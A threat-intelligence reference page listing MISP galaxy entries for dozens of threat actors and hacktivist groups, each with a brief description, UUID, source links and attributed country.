It was observed that a mobile network threat actor designated as ‘HiddenArt’ actively sustains a capacity to remotely access the personal devices of targeted individuals around the world on an ongoing basis. Since detecting this threat actor, periodic reconnaissance activities were observed in at least 7 target mobile networks around the world and given the wide geographic distribution of these targeted mobile operators, it is probable that the threat actor is active on a global scale.
Internal MISP references
UUID cdcfd3e1-4e42-4746-b1f1-66d5ce27b4da
which can be used as unique global reference for HiddenArt
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | RU |
REF5961
Elastic's security team has published a report on REF5961, a cyber-espionage group they found on the network of a Foreign Affairs Ministry from a member of the Association of Southeast Asian Nations (ASEAN). Elastic says it found the group's tools next to the malware of another cyber-espionage group it tracks as REF2924. REF5961's arsenal includes malware such as EAGERBEE, RUDEBIRD, and DOWNTOWN.
Internal MISP references
UUID 64234b2e-0c78-466d-8253-0df339f99f5f
which can be used as unique global reference for REF5961
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
REF2924
A group monitored as REF2924 by Elastic Security Labs is wielding novel data-stealing malware — an HTTP listener written in C# dubbed Naplistener by the researchers — in attacks against victims operating in southern and southeast Asia.According to a blog post by Elastic senior security research engineer Remco Sprooten, in that region of the world, network-based detection and prevention technologies are the de facto method for securing many environments.
Internal MISP references
UUID c46ed7e9-3949-4c57-ab14-177d88f27e2c
which can be used as unique global reference for REF2924
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | CN |
Storm-1133
In early 2023, Microsoft In early 2023, observed a wave of activity from a Gaza-based group that we track as Storm-1133 targeting Israeli private sector energy, defense, and telecommunications organizations.
Internal MISP references
UUID d5908276-068a-4a4f-a60d-ab5800173ccd
which can be used as unique global reference for Storm-1133
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | PS |
TA499
TA499, also known as Vovan and Lexus, is a Russia-aligned threat actor that has aggressively engaged in email campaigns since at least 2021. The threat actor’s campaigns attempt to convince high-profile North American and European government officials as well as CEOs of prominent companies and celebrities into participating in recorded phone calls or video chats.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular TA499.
Known Synonyms |
---|
Lexus |
Vovan |
Internal MISP references
UUID 0e9bbcf1-9273-4438-b437-287317bfb989
which can be used as unique global reference for TA499
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
BadRory
Kaspersky researchers have identified a new APT group named BadRory that has mounted two waves of spear-phishing attacks against Russian organizations. The campaigns took place in October 2022 and April 2023 and leveraged boobytrapped Office emails. Targets included government entities, military contractors, universities, and hospitals.
Internal MISP references
UUID aa74d1f3-b294-405b-bb18-3ac1c13560a1
which can be used as unique global reference for BadRory
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
SharpPanda
SharpPanda, an APT group originating from China, has seen a rise in its cyber-attack operations starting from at least 2018. The APT group utilizes spear-phishing techniques to obtain initial access, employing a combination of outdated Microsoft Office document vulnerabilities, novel evasion techniques, and highly potent backdoor malware.
Internal MISP references
UUID 7133a722-088c-4d5a-b2e0-a1f9915f807d
which can be used as unique global reference for SharpPanda
in MISP communities and other software using the MISP galaxy
External references
- https://blog.cyble.com/2023/06/01/sharppanda-apt-campaign-expands-its-arsenal-targeting-g20-nations/ - webarchive
- https://www.rewterz.com/rewterz-news/rewterz-threat-alert-sharppanda-chinese-apt-group-targets-southeast-asian-government-active-iocs - webarchive
- https://research.checkpoint.com/2021/chinese-apt-group-targets-southeast-asian-government-with-previously-unknown-backdoor/ - webarchive
- https://www.bsi.bund.de/DE/Themen/Unternehmen-und-Organisationen/Cyber-Sicherheitslage/Analysen-und-Prognosen/Threat-Intelligence/Aktive_APT-Gruppen/aktive-apt-gruppen_node.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['Germany'] |
country | CN |
Guacamaya
Guacamaya has conducted multiple hack and leak campaigns against military and police agencies and mining companies across Latin America, which they believe have played a role in the region’s environmental degradation and repression of native populations.
Internal MISP references
UUID 51f056f5-b596-446e-9394-a310af4e2e75
which can be used as unique global reference for Guacamaya
in MISP communities and other software using the MISP galaxy
External references
- https://cyberscoop.com/environmentalist-hacktivist-collective-mining-company/ - webarchive
- https://srslyriskybiz.substack.com/p/recent-cyber-chaos-is-a-structural - webarchive
- https://finance.yahoo.com/news/analysis-mexico-data-hack-exposes-003101651.html - webarchive
- https://www.redpacketsecurity.com/guacamaya-hacktivists-stole-sensitive-data-from-mexico-and-latin-american-countries/ - webarchive
- https://research.checkpoint.com/2022/3rd-october-threat-intelligence-report/ - webarchive
- https://www.cyberscoop.com/central-american-hacking-group-releases-emails/ - webarchive
- https://therecord.media/mexican-army-spyware - webarchive
Associated metadata
Metadata key | Value |
---|---|
DustSquad
Prodaft researchers have published a report on Paperbug, a cyber-espionage campaign carried out by suspected Russian-speaking group Nomadic Octopus and which targeted entities in Tajikistan. According to Prodaft, known compromised victims included high-ranking government officials, telcos, and public service infrastructures. Compromised devices also included OT devices, besides your typical computers, servers, and mobile devices. In typical Prodaft fashion, the company also gained access to one of the group's C&C server backend panels.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DustSquad.
Known Synonyms |
---|
Nomadic Octopus |
Internal MISP references
UUID 7b227f41-efea-4dc0-8a2a-148893795ce4
which can be used as unique global reference for DustSquad
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | RU |
KromSec
KromSec is a hacktivist group that claims to be composed of hackers, activists, writers, and journalists. The group has been involved in a number of high-profile cyberattacks, including a cyber offensive against Iran in September 2022 and the sale of the database of the Iran Ministry of Industries and Mines on a hacker forum in November 2023. KromSec's attacks have been met with mixed reactions, but the group has quickly made a name for itself as a significant threat to governments and organizations around the world.
Internal MISP references
UUID f4b81cb7-0492-414f-8bf4-cc806cbff1a9
which can be used as unique global reference for KromSec
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Cyber Av3ngers
The hacktivist group ‘Cyber Av3ngers’ has historically claimed attacks on Israel’s critical infrastructures. It has been launching DDoS attacks and claiming breach of Israeli networks with supporting data leaks.
Internal MISP references
UUID 286db62d-859d-48e2-9601-1b7abde9f3c3
which can be used as unique global reference for Cyber Av3ngers
in MISP communities and other software using the MISP galaxy
External references
- https://securelist.com/a-hack-in-hand-is-worth-two-in-the-bush/110794/ - webarchive
- https://cyberwarzone.com/cyber-av3ngers-claims-infiltration-of-israeli-water-treatment-stations-amid-ongoing-conflict/ - webarchive
- https://cyberwarzone.com/hacking-group-cyber-av3ngers-claims-responsibility-for-yavne-power-outages-what-you-need-to-know/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | IR |
Altahrea Team
Altahrea Team is a pro-Iranian hacking group that has been active since at least 2020. The group has claimed responsibility for a number of cyberattacks, including DDoS attacks against Israeli websites, a hack of the Israel Airports Authority website, and a cyberattack on the Orot Yosef power plant in Israel.
Internal MISP references
UUID b87f9ba7-f480-4ed5-b60e-b880e6b519ea
which can be used as unique global reference for Altahrea Team
in MISP communities and other software using the MISP galaxy
External references
- https://securelist.com/ddos-attacks-in-q2-2022/107025/ - webarchive
- https://www.timesofisrael.com/cyberattack-on-health-ministry-website-blocks-overseas-access/ - webarchive
- https://techmonitor.ai/technology/cybersecurity/alahrea-team-power-plant-fire-israel - webarchive
- https://www.presstv.ir/Detail/2022/07/27/686324/Iraqi-hacker-group--ALtahrea-Team--targets-Israeli-IT,-e-commerce-companies-with-major-cyber-attack - webarchive
- https://www.hackread.com/pro-iran-altahrea-hit-port-of-london-website-ddos-attack/ - webarchive
- https://nsi-globalcounterintelligence.com/cyber-security/pro-iran-hackers-target-israel-airports-authority-website/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | IQ |
1937CN
1937CN is a Chinese hacking group that has been active since at least 2013. The group is known for targeting Vietnamese organizations, including government agencies, businesses, and media outlets. 1937CN has been linked to a number of high-profile cyberattacks, including the hacking of Vietnam Airlines in 2016 and the defacement of Vietnamese government websites in 2015.
Internal MISP references
UUID 391573c5-9c21-4984-b6b8-97d42623d6cc
which can be used as unique global reference for 1937CN
in MISP communities and other software using the MISP galaxy
External references
- https://www.trendmicro.com/en_us/research/23/b/earth-zhulong-familiar-patterns-target-southeast-asian-firms.html - webarchive
- https://www.recordedfuture.com/international-hacktivism-analysis/ - webarchive
- http://securityaffairs.co/wordpress/49876/hacking/china-1937cn-team-vietnam.html - webarchive
- https://medium.com/@Sebdraven/malicious-document-targets-vietnamese-officials-acb3b9d8b80a - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | CN |
ShroudedSnooper
In September 2023, Cisco Talos identified a new malware family that it calls ‘HTTPSnoop’ being deployed against telecommunications providers in the Middle East. They also discovered a sister implant to 'HTTPSnoop,’ that they are naming ‘PipeSnoop,’ which can accept arbitrary shellcode from a named pipe and execute it on the infected endpoint. Based on these findings, the researchers assess with high confidence that both implants belong to a new intrusion set that it named ‘ShroudedSnooper.’
Internal MISP references
UUID 3437c5a5-4c42-4665-99df-b17bc57a7ba6
which can be used as unique global reference for ShroudedSnooper
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
ShinyHunters
ShinyHunters is a cybercriminal group of unknown origin that is motivated by financial gain. The group is known for its sophisticated attacks against a wide range of targets, including businesses, organizations, and government agencies. ShinyHunters typically uses phishing attacks and exploit kits to gain access to victim networks, where they deploy malware to steal sensitive data, such as names, addresses, phone numbers, Social Security numbers, and credit card information.
Internal MISP references
UUID d4fd0a30-15d4-4dfd-bf98-beff5fe34c33
which can be used as unique global reference for ShinyHunters
in MISP communities and other software using the MISP galaxy
External references
- https://cyberwarzone.com/shinyhunters-22-year-old-member-pleads-guilty-to-cyber-extortion-causing-6-million-in-damage/ - webarchive
- https://www.bitdefender.com/blog/hotforsecurity/pizza-hut-australia-leaks-one-million-customers-details-claims-shinyhunters-hacking-group/ - webarchive
- https://www.justice.gov/usao-wdwa/pr/alleged-french-cybercriminal-appear-seattle-indictment-conspiracy-computer-intrusion - webarchive
Associated metadata
Metadata key | Value |
---|---|
IronHusky
IronHusky is a Chinese-based threat actor first attributed in July 2017 targeting Russian and Mongolian governments, as well as aviation companies and research institutes. Since their initial attacks ceased in 2018, they have been working on a new remote access trojan dubbed MysterySnail.
Internal MISP references
UUID 34d1e532-3d47-44cb-b87c-7e9cbba2321e
which can be used as unique global reference for IronHusky
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | CN |
UserSec
UserSec is a pro-Russian hacking group that has been active since at least 2022. The group is known for its DDoS attacks and has collaborated with other pro-Russian hacking groups. In May 2023, UserSec announced a cyber campaign targeting NATO member states and joined forces with KillNet to launch attacks against NATO.
Internal MISP references
UUID d0e1811e-53f9-48b5-b2ef-107e0f53239b
which can be used as unique global reference for UserSec
in MISP communities and other software using the MISP galaxy
External references
- https://therecord.media/scandinavian-airlines-cyberattack-anonymous-sudan/ - webarchive
- https://blog.cyble.com/2023/05/24/notable-ddos-attack-tools-and-services-supporting-hacktivist-operations-in-2023/ - webarchive
- https://socradar.io/cyber-shadows-pact-darknet-parliament-killnet-anonymous-sudan-revil/ - webarchive
- https://socradar.io/dark-peep-2-war-and-a-piece-of-hilarity/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | RU |
UAC-0094
State Service of Special Communication and Information Protection of Ukraine spotted a new wave of cyber attacks aimed at gaining access to users’ Telegram accounts. The Ukrainian CERT attributes the hacking campaign to threat actors tracked as UAC-0094. Threat actors are targeting Telegram users by sending Telegram messages with malicious links to the Telegram website in order to gain unauthorized access to the records and transfer a one-time code from SMS.
Internal MISP references
UUID def3c4e4-9d59-478f-8895-d3850cfa99c3
which can be used as unique global reference for UAC-0094
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | RU |
TraderTraitor
TraderTraitor targets blockchain companies through spear-phishing messages. The group sends these messages to employees, particularly those in system administration or software development roles, on various communication platforms, intended to gain access to these start-up and high-tech companies. TraderTraitor may be the work of operators previously responsible for APT38 activity.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular TraderTraitor.
Known Synonyms |
---|
Jade Sleet |
Pukchong |
UNC4899 |
Internal MISP references
UUID 825abfd9-7238-4438-a9e7-c08791f4df4e
which can be used as unique global reference for TraderTraitor
in MISP communities and other software using the MISP galaxy
External references
- https://www.mandiant.com/resources/blog/north-korea-supply-chain - webarchive
- https://us-cert.cisa.gov/ncas/alerts/aa22-108a - webarchive
- https://www.mandiant.com/resources/blog/north-korea-cyber-structure-alignment-2023 - webarchive
- https://cloud.google.com/blog/topics/threat-intelligence/cyber-threats-targeting-brazil - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | KP |
TheDarkOverlord
The Dark Overlord is a financially motivated ransomware group that has been active since 2016. The group is known for targeting large organizations, including Netflix, ABC, and Miramax.
Internal MISP references
UUID 167bd5f9-fa61-4a4e-91bc-3ca0d17294b2
which can be used as unique global reference for TheDarkOverlord
in MISP communities and other software using the MISP galaxy
External references
- https://www.databreaches.net/peachtree-orthopedics-alerts-patients-of-cyberattack-third-patient-data-breach-in-seven-years/ - webarchive
- http://securityaffairs.co/wordpress/64782/data-breach/london-bridge-plastic-surgery-hack.html - webarchive
- http://www.csoonline.com/article/3193397/security/no-netflix-is-not-a-victim-of-ransomware.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
UNC2565
UNC2565 is a threat group that has used the GOOTLOADER downloader to deliver Cobalt Strike BEACON. These intrusions have stemmed from victims accessing malicious websites that use SEO techniques to improve Google search rankings. After obtaining a foothold in the environment, UNC2565 has conducted reconnaissance and credential harvesting activity using common tools such as BLOODHOUND and KERBEROAST. UNC2565's motivations are currently unknown but overlaps with activity that has led to SODINOKIBI ransomware. This suggests that the threat group may be financially motivated.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular UNC2565.
Known Synonyms |
---|
Hive0127 |
Internal MISP references
UUID d7d270d2-b91f-4978-a9e9-76fa7f0d8f06
which can be used as unique global reference for UNC2565
in MISP communities and other software using the MISP galaxy
External references
- https://www.mandiant.com/resources/blog/tracking-evolution-gootloader-operations - webarchive
- https://socradar.io/new-gootloader-variant-gootbot-changes-the-game-in-malware-tactics/ - webarchive
- https://securityintelligence.com/x-force/gootbot-gootloaders-new-approach-to-post-exploitation/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
Desorden Group
Desorden (Disorder in Spanish, previously known as ChaosCC), is a financially motivated hacker group. The group first emerged under the new name Desorden in September 2021, on Raidforums. Today the group maintains users under that name on several popular English-speaking hacking forums, where they share their attacks and ransom demands, and offer databases for sale. The group gained an excellent reputation among the cybercriminal communities due to their successful operations and the unique data that they share and offer for sale.
Internal MISP references
UUID e89ebfcb-e7a3-4b2d-b0d7-399bb4904e27
which can be used as unique global reference for Desorden Group
in MISP communities and other software using the MISP galaxy
External references
- https://www.databreaches.net/major-malaysian-water-utilities-company-hit-by-hackers-ranhill-offline-hackers-claim-databases-and-backups-deleted/ - webarchive
- https://www.databreaches.net/one-month-later-ranhill-still-hasnt-fully-recovered-from-cyberattack/ - webarchive
- https://www.databreaches.net/malaysian-online-stock-brokerage-firm-victim-of-cyberattack/ - webarchive
- https://www.databreaches.net/johnson-fitness-and-wellness-hit-by-desorden-group/ - webarchive
- https://www.databreaches.net/thailands-the-icon-group-hacked-by-desorden/ - webarchive
- https://www.databreaches.net/customer-data-from-hundreds-of-indonesian-and-malaysian-restaurants-hacked-by-desorden/ - webarchive
- https://www.databreaches.net/major-indonesia-tollroad-operator-hacked-by-desorden/ - webarchive
- https://www.databreaches.net/recent-cyberattacks-put-thai-citizens-privacy-and-data-security-at-greater-risk/ - webarchive
- https://www.databreaches.net/thai-entities-continue-to-fall-prey-to-cyberattacks-and-leaks/ - webarchive
- https://seclists.org/dataloss/2021/q4/81 - webarchive
Associated metadata
Metadata key | Value |
---|---|
Confucious
Confucius is an APT organization funded by India. It has been carrying out cyber attacks since 2013. Its main targets are India's neighbouring countries such as Pakistan and China. It has a strong interest in targets in the fields of military, government and energy.
Internal MISP references
UUID 54618130-55d3-4506-b62b-67f2dca12b04
which can be used as unique global reference for Confucious
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | IN |
Kiss-a-Dog
CrowdStrike identified a cryptojacking campaign targeting vulnerable Docker and Kubernetes infrastructure. Called “Kiss-a-dog,” the campaign targets Docker and Kubernetes infrastructure using an obscure domain from the payload, container escape attempt and anonymized “dog” mining pools.
Internal MISP references
UUID 1db6375f-0471-47c5-8128-5ab1519b01ab
which can be used as unique global reference for Kiss-a-Dog
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
DEV-1028
Microsoft reported on MCCrash, an IoT botnet operated by the DEV-1028 threat actor and used to launch DDoS attacks against private Minecraft servers.
Internal MISP references
UUID 6616d2ac-2025-47f8-bb1a-1ece2b627c16
which can be used as unique global reference for DEV-1028
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
TwoSail Junk
TwoSail Junk directs visitors to its exploit site by posting links within the threads of forum discussions, or creating new topic threads of their own. To date, dozens of visits were recorded from within Hong Kong, with a couple from Macau. The technical details around the functionality of the iOS implant, called LightSpy, and related infrastructure, reveal a low-to-mid capable actor. However, the iOS implant is a modular and exhaustively functional iOS surveillance framework.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular TwoSail Junk.
Known Synonyms |
---|
Operation Poisoned News |
Internal MISP references
UUID 533af03d-e160-4312-a92f-0500055f2b56
which can be used as unique global reference for TwoSail Junk
in MISP communities and other software using the MISP galaxy
External references
- https://securelist.com/ios-exploit-chain-deploys-lightspy-malware/96407/ - webarchive
- https://securelist.com/apt-annual-review-what-the-worlds-threat-actors-got-up-to-in-2020/99574/ - webarchive
- https://www.redpacketsecurity.com/operation-poisoned-news-hong-kong-users-targeted-with-mobile-malware-via-local-news-links/?utm_source=rss&utm_medium=rss&utm_campaign=operation-poisoned-news-hong-kong-users-targeted-with-mobile-malware-via-local-news-links - webarchive
Associated metadata
Metadata key | Value |
---|---|
Xcatze
Cloud security company Lacework says it discovered a threat actor group named Xcatze that uses a Python named AndroxGh0st to take over AWS servers and send out massive email spam campaigns. Lacework says the malware operates by scanning web apps written in the Laravel PHP framework for exposed configuration files to identify and steal server credentials. Researchers said AndroxGh0st specifically searches for AWS, SendGrid, and Twilio credentials, which it uses to take control of email servers and accounts and send out the spam campaigns.
Internal MISP references
UUID 83764206-8012-47c6-9c7a-dc04c99559e7
which can be used as unique global reference for Xcatze
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
BlueBottle
Bluebottle, a cyber-crime group that specializes in targeted attacks against the financial sector, is continuing to mount attacks on banks in Francophone countries. The group makes extensive use of living off the land, dual-use tools, and commodity malware, with no custom malware deployed in this campaign.
Internal MISP references
UUID 87f1ab70-a102-4566-a09e-838b39c18a62
which can be used as unique global reference for BlueBottle
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Dalbit
The group usually targets vulnerable servers to breach information including internal data from companies or encrypts files and demands money. Their targets of attack are usually Windows servers that are poorly managed or are not patched to the latest version. Besides these, there are also attack cases that targeted email servers or MS-SQL database servers.
Internal MISP references
UUID be4ea668-6a74-44d9-946e-e98e64a8855b
which can be used as unique global reference for Dalbit
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | CN |
SingularityMD
SingularityMD is a threat actor group that has targeted educational institutions in the US. They gained unauthorized access to their networks by exploiting weak security practices, such as using students' dates of birth as passwords. SingularityMD demanded a ransom in cryptocurrency and threatened to leak stolen information if not paid. They have demonstrated a willingness to follow through on their threats and have already leaked some data.
Internal MISP references
UUID d52a06dd-3ee9-47cf-ad31-b55ca4cbc5cf
which can be used as unique global reference for SingularityMD
in MISP communities and other software using the MISP galaxy
External references
- https://www.databreaches.net/jeffco-public-schools-hit-by-the-same-threat-actors-that-hit-clark-county-school-district-and-via-the-same-way/ - webarchive
- https://research.checkpoint.com/2023/30th-october-threat-intelligence-report/ - webarchive
- https://www.databreaches.net/hackers-escalate-leak-200k-ccsd-students-data-claim-to-still-have-access-to-ccsd-email-system/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
SCARLETEEL
SCARLETEEL is a threat actor that primarily targets cloud environments, specifically AWS and Kubernetes. They have been observed stealing proprietary data and intellectual property, as well as conducting cryptomining operations. SCARLETEEL employs sophisticated tactics and tools to bypass security measures and gain unauthorized access to accounts, often exploiting vulnerabilities in containerized workloads and misconfigurations in AWS policies.
Internal MISP references
UUID e03a7ecb-b8a1-40c5-b5af-638ee6029374
which can be used as unique global reference for SCARLETEEL
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
DiceyF
DiceyF is an advanced persistent threat group that has been targeting online casinos and other victims in Southeast Asia for an extended period. They have exhibited overlapping activity with LuckyStar PlugX and Earth Berberoka/GamblingPuppet, as reported by various cybersecurity vendors. While their motivations remain unclear, previous incidents suggest a combination of espionage and intellectual property theft rather than immediate financial gain. DiceyF continuously evolves their codebase and adds encryption capabilities to enhance their stealthy cyberespionage activities.
Internal MISP references
UUID 46de4091-379f-478c-bb6d-5833e2047f15
which can be used as unique global reference for DiceyF
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | CN |
DEV-0950
Lace Tempest, also known as DEV-0950, is a threat actor that exploited vulnerabilities in software such as SysAid and PaperCut to gain unauthorized access to systems. Lace Tempest is known for deploying the Clop ransomware and exfiltrating data from compromised networks.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DEV-0950.
Known Synonyms |
---|
Lace Tempest |
Internal MISP references
UUID 4581f930-348e-4054-a71c-863871de66ee
which can be used as unique global reference for DEV-0950
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
WeRedEvils
WeRedEvils is a hacking group that has claimed responsibility for multiple cyber attacks. They targeted the Iranian Electric Grid and the Tasnimnews website, causing the latter to go offline. The group also claimed to have hacked into Iran's oil infrastructure, causing significant damage. They emerged in response to the Hamas massacre and are believed to be a group of Israeli cyber experts.
Internal MISP references
UUID 7ba756f0-0753-4da9-b00d-8cf35ba84e57
which can be used as unique global reference for WeRedEvils
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | IL |
WIRTE
WIRTE is a threat actor group that was first discovered in 2018. They are suspected to be part of the Gaza Cybergang, an Arabic politically motivated cyber criminal group. WIRTE has been observed changing their toolkit and operating methods to remain undetected for longer periods of time. They primarily target governmental and political entities, but have also been known to target law firms and financial institutions.
Internal MISP references
UUID ec6bcaa9-4cb3-4397-a735-c806bc986c81
which can be used as unique global reference for WIRTE
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | PS |
Caracal Kitten
Caracal Kitten is an APT group that has been targeting activists associated with the Kurdistan Democratic Party. They employ a mobile remote access Trojan to gain unauthorized access to victims' devices. The group disguises their malware as legitimate mobile apps, tricking users into installing them and granting the hackers access to their personal data.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Caracal Kitten.
Known Synonyms |
---|
APT-Q-58 |
Internal MISP references
UUID 46a67fdf-5376-4d01-8092-6549a20030af
which can be used as unique global reference for Caracal Kitten
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Water Labbu
Trend Micro discovered a threat actor they named Water Labbu that was targeting cryptocurrency scam websites. Typically, cryptocurrency scammers use social engineering techniques, interacting with victims to gain their trust and then manipulating them into providing the permissions needed to transfer cryptocurrency assets. While Water Labbu managed to steal cryptocurrencies via a similar method by obtaining access permissions and token allowances from their victim’s wallets, unlike other similar campaigns, they did not use any kind of social engineering — at least not directly. Instead, Water Labbu lets other scammers use their social engineering tricks to scam unsuspecting victims.
Internal MISP references
UUID 7f24740c-9370-4968-a92e-667ef2591abe
which can be used as unique global reference for Water Labbu
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
TAG-56
TAG-56 is a threat actor group that shares similarities with the APT42 group. They use tactics such as fake registration pages and spearphishing to target victims, often using encrypted chat platforms like WhatsApp or Telegram. TAG-56 is believed to be part of a broader campaign led by an Iran-nexus threat activity group. They have been observed using shared web hosts and recycled code, indicating a preference for acquiring purpose-built infrastructure rather than establishing their own.
Internal MISP references
UUID 7cae7378-5595-4d1e-be63-e13216162a20
which can be used as unique global reference for TAG-56
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | IR |
TA482
Since early 2022, Proofpoint researchers have observed a prolific threat actor, tracked as TA482, regularly engaging in credential harvesting campaigns that target the social media accounts of mostly US-based journalists and media organizations. This victimology, TA482’s use of services originating from Turkey to host its domains and infrastructure, as well as Turkey’s history of leveraging social media to spread pro-President Recep Tayyip Erdogan and pro-Justice and Development Party (Turkey’s ruling party) propaganda support Proofpoint’s assessment that TA482 is aligned with the Turkish state.
Internal MISP references
UUID 610a7301-5963-4653-8aa2-eeb8573dfad9
which can be used as unique global reference for TA482
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | TR |
XakNet
XakNet is a self-proclaimed hacktivist group that has targeted Ukraine. They claim to be comprised of Russian patriotic volunteers and have conducted various threat activities, including DDoS attacks, compromises, data leaks, and website defacements. They coordinate their operations with other hacktivist groups and have connections to APT28, a cyber espionage group sponsored by the GRU.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular XakNet.
Known Synonyms |
---|
UAC-0100 |
UAC-0106 |
Internal MISP references
UUID 566752f5-a294-4430-b47e-8e705f9887ea
which can be used as unique global reference for XakNet
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | RU |
Zarya
Zarya is a pro-Russian hacktivist group that emerged in March 2022. Initially operating as a special forces unit under the command of Killnet, Zarya has since become an independent entity. The group is primarily known for engaging in Denial-of-Service attacks, website defacement campaigns, and data leaks. Zarya targets government agencies, service providers, critical infrastructure, and civil service employees, both domestically and internationally.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Zarya.
Known Synonyms |
---|
UAC-0109 |
Internal MISP references
UUID 3689f0e2-6c39-4864-ae0b-cc03e4cb695a
which can be used as unique global reference for Zarya
in MISP communities and other software using the MISP galaxy
External references
- https://www.mandiant.com/resources/blog/killnet-new-capabilities-older-tactics - webarchive
- https://www.cyfirma.com/?post_type=out-of-band&p=17397 - webarchive
- https://www.reversinglabs.com/blog/the-week-in-security-possible-colonial-pipeline-2.0-ransomware-hurts-small-american-eateries - webarchive
- https://channellife.com.au/story/the-increasing-presence-of-pro-russia-hacktivists - webarchive
- https://socradar.io/dark-web-profile-killnet-russian-hacktivist-group/ - webarchive
- https://cip.gov.ua/services/cm/api/attachment/download?id=60068 - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | RU |
DarkCasino
DarkCasino is an economically motivated APT group that targets online trading platforms, including cryptocurrencies, online casinos, network banks, and online credit platforms. They are skilled at stealing passwords to access victims' online accounts and have been active for over a year. DarkCasino exploits vulnerabilities, such as the WinRAR vulnerability CVE-2023-38831, to launch phishing attacks and steal online property.
Internal MISP references
UUID b9128c29-8941-48a8-a5be-8076dde03a08
which can be used as unique global reference for DarkCasino
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Prolific Puma
Prolific Puma provides an underground link shortening service to criminals. Infoblox states that during analysis, no legitimate content was observed being served through their shortener. For operation they use a registered domain generation algorithm (RDGA), based upon which they registered between 35k-75k domain names.
Internal MISP references
UUID c8782e46-447c-4c6e-90c0-82f3bf49d64b
which can be used as unique global reference for Prolific Puma
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Bohrium
Bohrium is an Iranian threat actor that has been involved in spear-phishing operations targeting organizations in the US, Middle East, and India. They often create fake social media profiles, particularly posing as recruiters, to trick victims into running malware on their computers. Microsoft's Digital Crimes Unit has taken legal action and seized 41 domains used by Bohrium to disrupt their activities. The group has shown a particular interest in sectors such as technology, transportation, government, and education.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Bohrium.
Known Synonyms |
---|
BOHRIUM |
Smoke Sandstorm |
Internal MISP references
UUID 111efc97-6a93-487b-8cb3-1e890ac51066
which can be used as unique global reference for Bohrium
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | IR |
KAX17
KAX17 is a sophisticated threat actor that has been active since at least 2017. They have operated hundreds of malicious servers within the Tor network, primarily as entry and middle points. Their main objective appears to be collecting information on Tor users and mapping their routes within the network. Despite efforts to remove their servers, KAX17 has shown resilience and continues to operate.
Internal MISP references
UUID 615311f0-58d4-4d1d-ac86-6ba86d119317
which can be used as unique global reference for KAX17
in MISP communities and other software using the MISP galaxy
External references
- https://www.malwarebytes.com/blog/news/2021/12/was-threat-actor-kax17-de-anonymizing-the-tor-network/amp - webarchive
- https://therecord.media/a-mysterious-threat-actor-is-running-hundreds-of-malicious-tor-relays - webarchive
- https://darknetlive.com/post/who-is-responsible-for-running-hundreds-of-malicious-tor-relays/ - webarchive
- https://nusenu.medium.com/is-kax17-performing-de-anonymization-attacks-against-tor-users-42e566defce8 - webarchive
Associated metadata
Metadata key | Value |
---|---|
MirrorFace
